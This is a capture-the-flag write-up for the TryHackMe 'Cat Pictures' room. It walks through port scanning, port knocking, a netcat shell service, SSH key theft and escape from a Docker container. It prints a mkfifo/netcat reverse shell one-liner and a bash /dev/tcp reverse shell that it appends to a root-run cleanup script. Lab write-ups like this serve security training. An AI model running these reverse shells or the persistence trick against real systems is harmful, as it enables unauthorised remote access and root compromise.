Cat Pictures

https://tryhackme.com/room/catpictures

Nmap

sudo nmap 10.10.217.166 -p- -sS -sV

PORT     STATE    SERVICE      VERSION
21/tcp   filtered ftp
22/tcp   open     ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
2375/tcp filtered docker
4420/tcp open     nvm-express?
8080/tcp open     http         Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)

Interestingly Nmap shows that port 21 is filtered which we can take note of. Running netcat against port 4420 appears to show a login for a shell. Unfortunately I was unable to proceed attempting common passwords.

Over on port 8080 we have a landing page for phpBB forums.

From here I tried to register an account and was unsuccessful regarding an error regarding 'Invalid MX domain'.

Looking at the only thread created by the site admin we see a potential reference to port knocking.

We can perform port knocking as per the bash command below in order to use Nmap to 'knock' the ports in sequence. After completion scanning the ports on the target again should open one of them.

for i in 1111 2222 3333 4444;do nmap -Pn -p $i --host-timeout 201 --max-retries 0 <IP>; done

sudo nmap 10.10.217.166 -F  -sS    

PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
53/tcp   filtered domain
8080/tcp open     http-proxy

We can now connect to the FTP.

Reading the contents of note.txt we are given the internal shell password.

After entering the password over netcat to port 4420 we now appear to have access to the target system.

From here I checked the installed software under /bin/ and found netcat to be installed. As such I opted to get a more usable netcat reverse shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <Port> >/tmp/f

From here checking home directory contents we see the user catlover has a file called runme in the home directory.

When running the file we are asked for a password to proceed. I tried the shell service password which was incorrect. From here I run cat on the file to view the contents and noticed the string 'rebecca' before the output asking for a password.

Entering rebecca password. we are then given the message 'Welcome, catlover! SSH key transfer queued!'.

After a short while id_rsa will appear in the users directory.

After transferring the contents of the id_rsa to my attacking machine I then used the following chmod command to set the correct permissions.

chmod 600 cat_rsa

We are then able to SSH in as the known user on the target machine.

We appear to be root. However, checking the machine hostname of 7546fa2336d6and the existence of the .dockerenv file in '/' we are more than likely in a docker container.

From here I noticed a file in /opt/clean.sh. Viewing the contents this looks like it is removing the contents of the /tmp/ directory. I placed some files in the directory and waited. After a short while the files had been removed from the directory.

As a result I placed a bash reverse shell into clean.sh

echo '0<&196;exec 196<>/dev/tcp/10.11.39.30/4422; sh <&196 >&196 2>&196' >> clean.sh

Where we soon recieve a reverse shell as root outside the docker container.